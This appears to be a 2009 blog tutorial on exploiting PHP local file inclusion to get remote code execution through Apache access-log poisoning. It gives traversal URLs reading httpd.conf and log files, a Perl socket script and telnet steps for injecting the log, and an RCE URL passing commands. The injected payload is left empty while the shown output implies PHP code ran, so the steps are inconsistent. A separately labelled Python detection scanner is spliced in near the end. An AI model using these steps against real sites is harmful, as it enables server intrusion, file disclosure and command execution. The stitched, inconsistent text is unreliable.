Thursday, September 3, 2009

LFI & RCE

- LFI (Local File Inclusion)
- RCE (Remote Code Execution)

Start !!!

First we must find the path of httpd.conf; on Apache it is usually at:

/etc/httpd/conf/httpd.conf

so the LFI exploit looks like this:

http://www.example.com/index.php?file=../../../../../../../../../etc/httpd/conf/httpd.conf

now we try to find access.log/access_log in httpd.conf, but remember the ServerAlias/site name it belongs to

example (two VirtualHost entries):

ServerAdmin webmaster@example1.com
DocumentRoot /home/matthews/httpdocs
ServerName example1.com
ServerAlias www.example1.com
ErrorLog /home/matthews/logs/error.log
CustomLog /home/matthews/logs/access.log common

ServerAdmin webmaster@example2.com
DocumentRoot /home/ander/httpdocs
ServerName example2.com
ServerAlias www.example2.com
ErrorLog /home/ander/logs/error.log
CustomLog /home/ander/logs/access.log common


Exploit:

http://www.example.com/index.php?file=../../../../../../../../../home/matthews/logs/access.log

or

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log


and then save this Perl script:

#==========================================================================================
# Sends one raw request whose request line Apache will copy into access.log.
use strict;
use warnings;
use IO::Socket::INET;

my $host = $ARGV[0] or die "usage: perl matthews.txt <host>\n";
print "\n [*] Injecting Apache Access Log ...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp")
    || die " [!] Can't connect to $host:80!\n";
# Text appended to the request line; whatever is here ends up in the log (left empty here).
my $matthews = "";
# Sent over a raw socket, so nothing is URL-encoded before it reaches the log.
print $sock "GET /matthews.m0de.0n ".$matthews." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print " [*] Done ...\n";

#==========================================================================================


and then save it on your PC as matthews.txt

open cmd and type:

perl matthews.txt www.example1.com <----- if you want to inject /home/matthews/logs/access.log
perl matthews.txt www.example2.com <----- if you want to inject /home/ander/logs/access.log


example

C:\xpl>perl matthews.txt www.example2.com

[*] Injecting Apache Access Log ...
[*] Done ...

if you don't have Perl on your computer, you can do it manually:

type in the console:

telnet www.example1.com 80
GET /matthews.m0de.0n HTTP/1.1

next

if you injected www.example2.com, then the access.log we open is:

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log


wait until the page finishes loading, then search for the string "matthews.m0de.0n"
if it works, you will see something like this:

"GET /matthews.m0de.0n
Warning: system() [function.system]: Cannot execute a blank command in /home/ander/logs/access.log on line 709

look at the string "Cannot execute a blank command" <----- this confirms RCE is possible :D
for the RCE exploit, use:

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log&matthews=[CMD]
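As an added example (not from the original post), here is the defender-side check: a small Python scanner over Apache common-format log lines that flags the two artefacts this technique leaves behind, a request line carrying PHP tags into access.log and an include parameter traversing to httpd.conf or a log file. The sample log lines, hosts and paths are constructed for this example.

```python
import re
from urllib.parse import unquote

# Apache "common" LogFormat, the format named in the CustomLog lines above.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# PHP open tags inside a logged request: the marker of a log-poisoning attempt.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Repeated "../" ending at the files this technique reads through the include parameter.
TRAVERSAL_RE = re.compile(
    r'(\.\./){2,}.*(httpd\.conf|access[_.]?log|error[_.]?log)', re.IGNORECASE
)

def classify(line):
    """Return finding labels for one access-log line; an empty list means clean."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable"]
    # Decode %2e%2e%2f-style encoding first, otherwise encoded traversal slips past.
    req = unquote(m.group("request"))
    findings = []
    if PHP_TAG_RE.search(req):
        findings.append("php_tag_in_request")
    if TRAVERSAL_RE.search(req):
        findings.append("traversal_to_conf_or_log")
    return findings

def scan(text):
    """Return (line_number, findings) for every flagged line of a log excerpt."""
    return [(n, f) for n, l in enumerate(text.splitlines(), 1) if (f := classify(l))]

# Constructed sample lines (hypothetical hosts and paths, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [03/Sep/2009:10:00:01 +0000] "GET /index.php?file=about.html HTTP/1.1" 200 512
10.0.0.9 - - [03/Sep/2009:10:00:02 +0000] "GET /index.php?file=../../../../../../../../../etc/httpd/conf/httpd.conf HTTP/1.1" 200 8192
10.0.0.9 - - [03/Sep/2009:10:00:03 +0000] "GET /<?php echo 'poisoned'; ?> HTTP/1.1" 404 210
10.0.0.9 - - [03/Sep/2009:10:00:04 +0000] "GET /index.php?file=..%2F..%2F..%2Fhome%2Fander%2Flogs%2Faccess.log HTTP/1.1" 200 99000
"""

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(findings)}")
```

Running it against a live access.log that is already poisoned only reads the file, so the check itself never executes the stored tags; feed it the raw text, not an include.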

finish


my blog : http://matthews-diablo.blogspot.com

thank's for c0li.m0de.0n
